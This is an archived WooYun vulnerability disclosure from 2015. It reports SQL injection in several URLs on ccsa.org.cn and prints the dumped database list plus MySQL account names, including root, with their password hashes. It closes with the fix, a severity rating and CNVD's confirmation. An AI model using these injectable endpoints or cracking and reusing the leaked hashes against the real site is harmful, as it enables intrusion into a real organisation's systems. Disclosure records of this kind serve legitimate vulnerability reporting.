乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-28: 细节已通知厂商并且等待厂商处理中 2015-08-01: 厂商已经确认,细节仅向厂商公开 2015-08-11: 细节向核心白帽子及相关领域专家公开 2015-08-21: 细节向普通白帽子公开 2015-08-31: 细节向实习白帽子公开 2015-09-15: 细节向公众公开
又是一枚凶残注入!
http://www.ccsa.org.cn/organization/intro.php?org=ASTAP
http://www.ccsa.org.cn/organization/index.php3?category_id=3
http://www.ccsa.org.cn/tc/meeting.php?meeting_id=5163
http://www.ccsa.org.cn/peixun/pxresult.php3?VTI-GROUP=0&name=1&term=1&unit=&start_date=&dead_date=&cert_start_date=&cert_dead_date=&B1=1
available databases [44]:[*] article[*] auth[*] ccsa_access_log[*] ccsadoc[*] client_update[*] customer[*] del_mladvert[*] del_ptpic[*] del_pw_log[*] del_style[*] del_test[*] del_tmparticle[*] doc[*] fileopen[*] ftpusers[*] good_member[*] gsc15[*] information_schema[*] IOofCOM[*] jiaoliu[*] log[*] logs[*] lost+found[*] maintain[*] meeting[*] ml4ccsa[*] ml4ptsn[*] mnogosearch[*] mysql[*] phpmyadmin[*] prod[*] prodex[*] questionnaire[*] sales[*] shenbao[*] std[*] std_temp[*] stdcd[*] tc485[*] test[*] tlc[*] tspc[*] userstd[*] vpopmail
[*] auth_rd [1]: password hash: 300582b60d0ce39f[*] auth_rw [1]: password hash: 7363df490bd6e5ee[*] backup [1]: password hash: 6360f4a4380593b6[*] ccsa_rd [1]: password hash: 694bf0e84e1746b6[*] ccsa_rw [1]: password hash: 0bbe89a47b7e9f94[*] doc_rd [1]: password hash: 6f8c7ba26dfd93fe[*] doc_rw [1]: password hash: 67c4ea1842a027a1[*] ftp [1]: password hash: 654925394d80d5e4[*] infosrv [1]: password hash: 1c9c80061d48e945[*] log_rd [1]: password hash: 408efbf60d3c8899[*] log_rw [1]: password hash: 32a437f543402d9c[*] mailuser [1]: password hash: 14780cf32b1ea347[*] maint_rw [1]: password hash: 7f38034b3972ae37[*] mepadmin [1]: password hash: 6fc780f149d98015[*] minfosrv [1]: password hash: 6c90aa2604862b9b[*] mlog [1]: password hash: 06988dd331f93204[*] mproduct [1]: password hash: 32099b90045157c1[*] mptpic [1]: password hash: 773359240eb9a1d9[*] mptqc [1]: password hash: 0107187807836006[*] mptsn_auth [1]: password hash: 57cf2b7f207cc98c[*] prod_rd [1]: password hash: 7ac54f89754e39ab[*] prod_rw [1]: password hash: 3d4faebb32aedf8c[*] ptpic [1]: password hash: 0206b55f23e2e967[*] ptpic_rd [1]: password hash: 34bba4f421608fb9[*] ptpic_rw [1]: password hash: 5b85aec77f441075[*] ptqc [1]: password hash: 6ec627e402484936[*] ptqc_rd [1]: password hash: 58eba2fc22d22204[*] ptqc_rw [1]: password hash: 326fd13f1db64eba[*] ptsn_auth [1]: password hash: 362f29946e86ae30[*] readall [1]: password hash: 13f162af21797902[*] root [1]: password hash: 0af4727b4f928228[*] shouli [1]: password hash: 1f1d533a5b0f5247[*] shouli_rd [1]: password hash: 472c940019929961[*] shouli_rw [1]: password hash: 5bd622e73f6459c9[*] std_rd [1]: password hash: 12e8cd2f1c97b82d[*] std_rw [1]: password hash: 4b31b6b72a2ffa73[*] tlcadmin [1]: password hash: 0c979a9e1a1a7df0[*] tlcwebuser [1]: password hash: 0c979a9e1a1a7df0[*] userstd_rw [1]: password hash: 57aec995239e6fc7[*] vpopmail [1]: password hash: 38755f107acb1b50
waf+过滤
危害等级:中
漏洞Rank:10
确认时间:2015-08-01 15:07
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。
暂无